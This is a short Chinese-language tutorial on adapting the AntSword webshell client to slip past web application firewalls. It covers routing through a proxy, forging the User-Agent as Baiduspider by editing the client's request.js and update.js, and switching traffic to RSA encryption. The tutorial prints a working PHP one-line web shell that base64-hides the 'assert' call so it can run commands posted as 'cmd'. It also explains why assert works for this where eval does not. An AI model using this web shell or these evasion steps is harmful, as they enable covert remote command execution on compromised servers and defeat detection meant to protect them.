针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行这几部分的修改:
1)开启蚁剑代理设置
2)UA特征伪造
3)RSA流量加密
1.开启蚁剑代理设置
PS:前提必须设置代理
2.UA特征伪造
1)修改前抓取数据包查看UA字段
2)本次设置成百度UA,也可设置成其他UA
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
3)修改/modules/request.js文件
4)修改/modules/update.js文件
5)修改后再次抓取数据包进行查看,成功修改了UA字段
3.RSA流量加密
蚁剑从2.1开始支持了RSA加密算法,但是仅仅支持php
<?php $k=base64_decode('YXNzZXJ0'); $k($_POST['cmd']); ?>
注意这里YXNzZxJ0 base64解密为assert,eval不可以。因为eval属于语言构造器,在php中不能来回调,类似call_user_function()。
1)采用RSA加密,新建一个rsa编码器
2)进行RSA配置,将代码拷入公钥,生成对应私钥
3)连接马文件,编辑数据,选择刚刚设置的编码脚本
4)抓取数据包进行查看,数据进行了加密